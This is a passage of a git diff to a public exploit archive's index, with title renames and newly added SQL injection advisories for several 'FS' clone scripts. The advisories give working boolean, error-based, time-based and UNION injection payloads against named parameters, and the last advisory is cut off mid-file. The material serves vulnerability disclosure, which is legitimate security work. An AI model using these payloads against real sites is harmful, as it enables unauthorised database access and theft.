2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps,0 @@ -24905,7 +24906,7 @@ id,file,description,date,author,platform,type,port 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 -15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 +15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Information Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosures",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 15453,platforms/php/webapps/15453.txt,"Joomla! Component Cookex Agency CKForms - Local File Inclusion",2010-11-08,ALTBTA,php,webapps,0 15454,platforms/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -25205,7 +25206,7 @@ id,file,description,date,author,platform,type,port 16109,platforms/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 16113,platforms/php/webapps/16113.txt,"osCommerce - Authentication Bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0 -16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 +16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script - SQL Injection",2011-02-05,NoNameMT,php,webapps,0 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b - 'index.php' SQL Injection",2011-02-06,AtT4CKxT3rR0r1ST,php,webapps,0 16221,platforms/php/webapps/16221.txt,"WordPress Plugin Comment Rating 2.9.23 - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 @@ -25381,7 +25382,7 @@ id,file,description,date,author,platform,type,port 17077,platforms/php/webapps/17077.txt,"Pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0 17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0 17080,platforms/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0 -17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 +17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Authentication Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 17084,platforms/php/webapps/17084.txt,"Andy's PHP KnowledgeBase 0.95.2 - 'viewusers.php' SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps,0 17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -26561,7 +26562,7 @@ id,file,description,date,author,platform,type,port 21411,platforms/cgi/webapps/21411.txt,"vqServer 1.9.x - CGI Demo Program Script Injection",2002-04-21,"Matthew Murphy",cgi,webapps,0 21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem - Authentication Bypass",2012-09-20,"Glafkos Charalambous",hardware,webapps,0 21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion",2012-09-20,L0n3ly-H34rT,php,webapps,0 -21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Login Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0 +21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Authentication Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection",2002-04-25,frog,php,webapps,0 21424,platforms/php/webapps/21424.txt,"ADManager 1.1 - Content Manipulation",2002-04-17,frog,php,webapps,0 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 @@ -27691,7 +27692,7 @@ id,file,description,date,author,platform,type,port 24368,platforms/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,asp,webapps,0 24369,platforms/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - 'MapFrame.asp?mapname' Cross-Site Scripting",2004-07-15,anonymous,asp,webapps,0 24370,platforms/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 - Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,asp,webapps,0 -24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Login Bypass",2004-07-15,anonymous,asp,webapps,0 +24371,platforms/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Authentication Bypass",2004-07-15,anonymous,asp,webapps,0 24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting",2004-07-16,"Debasis Mohanty",php,webapps,0 24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",php,webapps,0 24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection",2004-07-16,"Fernando Quintero",php,webapps,0 @@ -28437,7 +28438,7 @@ id,file,description,date,author,platform,type,port 25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 - 'member.php' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Start-Page.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 - 'Style.CSS.php3' Cross-Site Scripting",2005-05-13,Megasky,php,webapps,0 -25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Download",2005-05-01,"g0rellazz G0r",asp,webapps,0 +25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery - Database Disclosure",2005-05-01,"g0rellazz G0r",asp,webapps,0 25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 25663,platforms/php/webapps/25663.txt,"Shop-Script - categoryId SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25664,platforms/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -28892,7 +28893,7 @@ id,file,description,date,author,platform,type,port 26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 26243,platforms/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 26244,platforms/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",php,webapps,0 -26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass",2013-06-17,Chako,php,webapps,0 +26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Authentication Bypass",2013-06-17,Chako,php,webapps,0 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection",2005-09-09,stranger-killer,php,webapps,0 40300,platforms/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload",2016-08-29,"Lars Morgenroth",php,webapps,80 26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,php,webapps,0 @@ -30057,7 +30058,7 @@ id,file,description,date,author,platform,type,port 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - 'gate2.php' Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 27751,platforms/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80 -27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-08-21,"Scott Buckel",windows,webapps,0 +27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Authentication Bypass",2013-08-21,"Scott Buckel",windows,webapps,0 27756,platforms/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps,0 27757,platforms/asp/webapps/27757.txt,"DUclassified - 'detail.asp' SQL Injection",2006-04-28,sadegh.sarshogh,asp,webapps,0 27761,platforms/cgi/webapps/27761.txt,"NeoMail - 'NeoMail.pl?sessionid' Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 @@ -31297,7 +31298,7 @@ id,file,description,date,author,platform,type,port 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0 -29500,platforms/asp/webapps/29500.txt,"RASPcalendar 1.01 - [ASP] Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps,0 +29500,platforms/asp/webapps/29500.txt,"RASPcalendar 1.01 (ASP) - Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps,0 29504,platforms/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,php,webapps,0 29505,platforms/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0 @@ -31642,7 +31643,7 @@ id,file,description,date,author,platform,type,port 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0 29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0 29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,java,webapps,0 -29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Info Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0 +29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Information Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0 29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - Cross-Site Request Forgery",2013-11-30,"mohammed al-saggaf",hardware,webapps,0 29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-30,sajith,hardware,webapps,0 29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - 'BRY.asp' SQL Injection",2007-04-26,RMx,asp,webapps,0 @@ -32304,7 +32305,7 @@ id,file,description,date,author,platform,type,port 31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0 31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31141,platforms/php/webapps/31141.txt,"godontologico 5 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 -31142,platforms/php/webapps/31142.txt,"Simple E-document 1.31 - Login Bypass",2014-01-23,vinicius777,php,webapps,0 +31142,platforms/php/webapps/31142.txt,"Simple E-document 1.31 - Authentication Bypass",2014-01-23,vinicius777,php,webapps,0 31143,platforms/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31144,platforms/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31145,platforms/php/webapps/31145.txt,"Easy POS System - 'login.php' SQL Injection",2014-01-23,vinicius777,php,webapps,0 @@ -33018,7 +33019,7 @@ id,file,description,date,author,platform,type,port 32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'scrapbook.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'tribes.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32204,platforms/hardware/webapps/32204.txt,"ZYXEL P-660HN-T1A Router - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 +32204,platforms/hardware/webapps/32204.txt,"ZYXEL P-660HN-T1A Router - Authentication Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80 @@ -33856,7 +33857,7 @@ id,file,description,date,author,platform,type,port 33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections",2010-03-18,blake,php,webapps,0 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - '/detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 -33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open redirection",2010-03-22,Lament,jsp,webapps,0 +33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open Redirection",2010-03-22,Lament,jsp,webapps,0 33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions",2010-03-23,eidelweiss,php,webapps,0 33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection",2010-03-22,n3w7u,php,webapps,0 33784,platforms/php/webapps/33784.txt,"vBulletin 4.0.2 - Search Cross-Site Scripting",2010-03-19,5ubzer0,php,webapps,0 @@ -36491,7 +36492,7 @@ id,file,description,date,author,platform,type,port 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 38012,platforms/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0 -38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 +38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form SQL Injection",2012-11-09,anonymous,multiple,webapps,0 38017,platforms/php/webapps/38017.txt,"WordPress Theme Kakao - 'ID' SQL Injection",2012-11-09,sil3nt,php,webapps,0 38018,platforms/php/webapps/38018.txt,"WordPress Plugin PHP Event Calendar - 'cid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38019,platforms/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 @@ -36685,7 +36686,7 @@ id,file,description,date,author,platform,type,port 38406,platforms/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 -38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 +38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config Disclosure",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 @@ -38726,3 +38727,14 @@ id,file,description,date,author,platform,type,port 43024,platforms/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",multiple,webapps,0 43027,platforms/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,php,webapps,0 43028,platforms/php/webapps/43028.py,"Kaltura < 13.1.0 - Remote Code Execution",2017-10-23,"Robin Verton",php,webapps,0 +43034,platforms/php/webapps/43034.txt,"FS Car Rental Script - 'pickup_location' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43035,platforms/php/webapps/43035.txt,"FS Amazon Clone - 'category_id' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43036,platforms/php/webapps/43036.txt,"FS Book Store Script - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43037,platforms/php/webapps/43037.txt,"FS Ebay Clone - 'pd_maincat_id' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43038,platforms/php/webapps/43038.txt,"FS Food Delivery Script - 'keywords' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43039,platforms/php/webapps/43039.txt,"FS Expedia Clone - 'hid' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43040,platforms/php/webapps/43040.txt,"FS Freelancer Clone - 'sk' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43041,platforms/php/webapps/43041.txt,"FS Groupon Clone - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43042,platforms/php/webapps/43042.txt,"FS Indiamart Clone - 'keywords' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43043,platforms/php/webapps/43043.txt,"FS Lynda Clone - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps,0 +43044,platforms/php/webapps/43044.txt,"FS OLX Clone - 'catg_id' SQL Injection",2017-10-23,8bitsec,php,webapps,0 diff --git a/platforms/php/webapps/43034.txt b/platforms/php/webapps/43034.txt new file mode 100755 index 000000000..063f5e479 --- /dev/null +++ b/platforms/php/webapps/43034.txt @@ -0,0 +1,45 @@ +# Exploit Title: FS Car Rental Script - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/car-rental-script/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +This is a versatile script to help you to launch a car rental website. + +Technical Details & Description: +================================ + +SQL injection on [pickup_location] post parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/vehicle/ + +Parameter: pickup_location (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: pickup_location=7 AND 8531=8531&pickup_date=2017-10-24 12:19:35&dropoff_date=2017-10-24 12:19:36 + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: pickup_location=7 AND (SELECT 7390 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(7390=7390,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&pickup_date=2017-10-24 12:19:35&dropoff_date=2017-10-24 12:19:36 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: pickup_location=7 AND SLEEP(5)&pickup_date=2017-10-24 12:19:35&dropoff_date=2017-10-24 12:19:36 + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43035.txt b/platforms/php/webapps/43035.txt new file mode 100755 index 000000000..df5ff5794 --- /dev/null +++ b/platforms/php/webapps/43035.txt @@ -0,0 +1,45 @@ +# Exploit Title: FS Amazon Clone - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/amazon-clone/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +Frontrunner in the field of all the multi-vendor scripts. + +Technical Details & Description: +================================ + +SQL injection on [category_id] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/search.php?category_id=1 AND 2635=2635&sub_category_id=1&search=xxxxx + +Parameter: category_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: category_id=1 AND 2635=2635&sub_category_id=1&search=xxxxx + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: category_id=1 AND SLEEP(5)&sub_category_id=1&search=xxxxx + + Type: UNION query + Title: Generic UNION query (NULL) - 15 columns + Payload: category_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71786a7071,0x714e746578554b6b4b4274697974755366576555457a6c6c576269474c7877744347466d6647695a,0x7176767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JpGm&sub_category_id=1&search=xxxxx + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43036.txt b/platforms/php/webapps/43036.txt new file mode 100755 index 000000000..f4368f9e4 --- /dev/null +++ b/platforms/php/webapps/43036.txt @@ -0,0 +1,37 @@ +# Exploit Title: FS Book Store Script - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/book-store-script/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +This is a robust platform for the booksellers and bookshop owners. + +Technical Details & Description: +================================ + +SQL injection on [category] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/book_search.php?book_name=xxxxx&category=4 AND SLEEP(5) + +Parameter: category (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: book_name=xxxxx&category=4 AND SLEEP(5) + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43037.txt b/platforms/php/webapps/43037.txt new file mode 100755 index 000000000..b314e8dea --- /dev/null +++ b/platforms/php/webapps/43037.txt @@ -0,0 +1,41 @@ +# Exploit Title: FS Ebay Clone - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/ebay-clone/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +This is indeed the best standard auction product pre-integrated with a robust multi-vendor interface and a powerful CMS panel. + +Technical Details & Description: +================================ + +SQL injection on [pd_maincat_id] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/advance-search-result.php?keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search + +Parameter: pd_maincat_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: keywords=any&pd_maincat_id=1' AND SLEEP(5) AND 'aHHy'='aHHy&submit=Search + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43038.txt b/platforms/php/webapps/43038.txt new file mode 100755 index 000000000..2ec505bf1 --- /dev/null +++ b/platforms/php/webapps/43038.txt @@ -0,0 +1,41 @@ +# Exploit Title: FS Food Delivery Script - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/food-delivery/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +This is a versatile script to help you launch a online food delivery portal like Foodpanda. + +Technical Details & Description: +================================ + +SQL injection on [keywords] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/food/ + +Parameter: keywords (POST) + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: keywords=xxxxx' AND (SELECT 2438 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (ELT(2438=2438,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TkKa'='TkKa&order_option=1&category=1&price=1000 + + Type: UNION query + Title: Generic UNION query (NULL) - 22 columns + Payload: keywords=xxxxx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786a71,0x497a704b724e4c4e665a556e6b626d45534a696d5a79554d726e506a686a6c5649627355675a6269,0x7162717871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hSOz&order_option=1&category=1&price=1000 + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43039.txt b/platforms/php/webapps/43039.txt new file mode 100755 index 000000000..480b27b31 --- /dev/null +++ b/platforms/php/webapps/43039.txt @@ -0,0 +1,44 @@ +# Exploit Title: FS Expedia Clone - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/expedia-clone/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +Coded in PHP/MySQL, this is an ultra efficient script hot favorite with travel agencies worldwide. + +Technical Details & Description: +================================ + +SQL injection on [hid] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/hotel.php?hid=2 AND 6652=6652 + +Parameter: hid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: hid=2 AND 6652=6652 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: hid=2 AND SLEEP(5) + + Type: UNION query + Title: Generic UNION query (NULL) - 9 columns + Payload: hid=-1685 UNION ALL SELECT NULL,CONCAT(0x7162716271,0x696b6a4c52576c76446173666d5972704d454258706146434f544c78416a52754444694864786a42,0x7176786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Nqcw +================== +8bitsec - 